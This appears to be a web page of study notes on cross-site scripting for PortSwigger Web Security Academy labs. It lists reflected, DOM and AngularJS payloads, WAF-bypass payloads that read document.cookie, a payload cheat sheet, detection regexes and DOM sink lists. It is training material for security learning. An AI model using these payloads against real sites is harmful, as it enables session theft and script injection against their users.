PortSwigger XSS Reflected Stored DOM

XSS — Cross-Site Scripting

Payloads, WAF bypass techniques, DOM sinks and a complete XSS cheat sheet.

Reflected XSS — Payloads comunes

HTML/JS
<script>alert(1)</script>
<script>print(1)</script>

" autofocus onfocus=alert(1) x="

<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>

<a href="javascript:alert(1)">Click me</a>

Reflected XSS — Most tags and attributes blocked

iframe onresize
<iframe src="https://LAB.web-security-academy.net/?search=%3Cbody%20onresize=alert(document.cookie)%3E"
        onload=this.style.width='100px'>

Reflected XSS — All tags blocked except custom ones

Custom tag + tabindex focus
<script>
location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>

DOM XSS — AngularJS template injection

Angular sandbox escape
{{$on.constructor('alert(1)')()}}

Keywords for spotting XSS in source code

eval()
document.cookie
alert()
innerHTML
onmouseover
onload
onerror
src
href
javascript:
script
img
svg

Regex to find possible attack points

1. <script> tags
/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi
/<script[^>]*>([\s\S]*?)<\/script>/gi
2. HTML event attributes
/(on\w+)=["']([^"']+)["']/gi
/(on\w+)\s*=\s*([^>]+)/gi
3. JavaScript URLs in attributes
/javascript:(?:(?![\s"'])[^:;"'])*(?:(?:"|')(?:(?![;"']).)*|[^;"'\s])?/gi

Cheat Sheet

Basic Payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
Event Handlers
<img src="#" onclick=alert(1)>
<input onmouseover=alert(1)>
<a href="javascript:alert(1)">x</a>
DOM-based
http://x.com/page#<img src=x onerror=alert(1)>
http://x.com/?lang=<img src=x onerror=alert(1)>

DOM-XSS Sinks

Vanilla DOM sinks
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent
jQuery DOM sinks
add() / after() / append() / animate()
insertAfter() / insertBefore() / before()
html() / prepend() / replaceAll()
replaceWith() / wrap() / wrapInner()
wrapAll() / has() / constructor()
init() / index()
jQuery.parseHTML() / $.parseHTML()

XXE Injection

Related module: XML external entity injection for file reads, SSRF and data exfiltration.

See XXE Injection →